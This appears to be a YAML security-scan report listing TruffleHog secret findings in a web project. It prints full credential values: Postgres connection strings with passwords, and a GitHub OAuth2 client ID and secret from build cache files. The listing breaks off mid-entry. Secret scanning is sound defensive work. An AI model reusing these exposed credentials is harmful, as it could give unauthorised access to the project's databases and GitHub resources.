56691 lines
1.5 MiB
Plaintext
56691 lines
1.5 MiB
Plaintext
meta:
|
|
output_version: 1.0.0
|
|
jmo_version: 1.0.5
|
|
schema_version: 1.2.0
|
|
timestamp: '2026-05-21T06:36:10.198780Z'
|
|
scan_id: 202284b8-0052-4181-970d-ee2285144fcf
|
|
profile: ''
|
|
tools:
|
|
- checkov
|
|
- hadolint
|
|
- semgrep
|
|
- syft
|
|
- trivy
|
|
- trufflehog
|
|
- zap
|
|
target_count: 1
|
|
finding_count: 712
|
|
platform: Linux
|
|
findings:
|
|
- schemaVersion: 1.2.0
|
|
id: d818f4846421d653
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.env.docker.production.example
|
|
startLine: 0
|
|
message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.env.docker.production.example
|
|
line: 9
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: &id001
|
|
- control: '3.11'
|
|
title: Encrypt Sensitive Data at Rest
|
|
implementationGroup: IG1
|
|
- control: '5.4'
|
|
title: Restrict Administrator Privileges to Dedicated Administrator Accounts
|
|
implementationGroup: IG1
|
|
nistCsf2_0:
|
|
- &id002
|
|
function: PROTECT
|
|
category: PR.AC
|
|
subcategory: PR.AC-1
|
|
description: Identities and credentials are issued, managed, verified, revoked,
|
|
and audited
|
|
- &id003
|
|
function: PROTECT
|
|
category: PR.DS
|
|
subcategory: PR.DS-1
|
|
description: Data-at-rest is protected
|
|
pciDss4_0:
|
|
- &id004
|
|
requirement: 8.3.2
|
|
description: Strong cryptography for authentication credentials
|
|
priority: CRITICAL
|
|
- &id005
|
|
requirement: 8.2.1
|
|
description: Verify user identity before credential modification
|
|
priority: HIGH
|
|
mitreAttack:
|
|
- &id006
|
|
tactic: Credential Access
|
|
technique: T1552
|
|
techniqueName: Unsecured Credentials
|
|
subtechnique: T1552.001
|
|
subtechniqueName: Credentials in Files
|
|
- &id007
|
|
tactic: Initial Access
|
|
technique: T1078
|
|
techniqueName: Valid Accounts
|
|
subtechnique: ''
|
|
subtechniqueName: ''
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 35ed8d11af314afa
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.env.local
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.env.local
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 48b308b8dd5acde8
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.env.docker.dev
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.env.docker.dev
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1c16bda367ac0bd8
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.env.docker.test
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.env.docker.test
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: deeba988a9ab6141
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 381c867d67edf2e8
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208
|
|
startLine: 0
|
|
message: postgresql://postgres:change-me@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208
|
|
line: 7
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:change-me@postgres:5432
|
|
RawV2: postgresql://postgres:change-me@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: edccc43a23cfabf6
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aae1f539799fb2de
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06
|
|
startLine: 0
|
|
message: postgresql://postgres:password@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:password@postgres:5432
|
|
RawV2: postgresql://postgres:password@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 786bfda631317a71
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924
|
|
startLine: 0
|
|
message: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924
|
|
line: 7
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
|
|
RawV2: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 595d2f235b05e737
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc
|
|
startLine: 0
|
|
message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc
|
|
line: 9
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3ed146267f450c31
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c
|
|
startLine: 0
|
|
message: postgresql://postgres:change-me@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c
|
|
line: 7
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:change-me@postgres:5432
|
|
RawV2: postgresql://postgres:change-me@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2998e9823a9a5e07
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46
|
|
startLine: 0
|
|
message: postgresql://postgres:change-me@postgres:5432
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46
|
|
line: 10
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: postgresql://postgres:change-me@postgres:5432
|
|
RawV2: postgresql://postgres:change-me@postgres:5432
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d6855b7ba77520b3
|
|
ruleId: GitHubOauth2
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz
|
|
startLine: 0
|
|
message: 52813b1d8ad9af510d85
|
|
title: GitHubOauth2 secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz
|
|
line: 10674
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 924
|
|
DetectorName: GitHubOauth2
|
|
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
|
|
applications to access GitHub's API on behalf of a user or organization. These
|
|
credentials include a client ID and client secret, which can be used to obtain
|
|
access tokens for accessing GitHub resources.
|
|
DecoderName: BASE64
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: 52813b1d8ad9af510d85
|
|
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/github/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 437a1c93140bc172
|
|
ruleId: GitHubOauth2
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz
|
|
startLine: 0
|
|
message: 52813b1d8ad9af510d85
|
|
title: GitHubOauth2 secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz
|
|
line: 9955
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 924
|
|
DetectorName: GitHubOauth2
|
|
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
|
|
applications to access GitHub's API on behalf of a user or organization. These
|
|
credentials include a client ID and client secret, which can be used to obtain
|
|
access tokens for accessing GitHub resources.
|
|
DecoderName: PLAIN
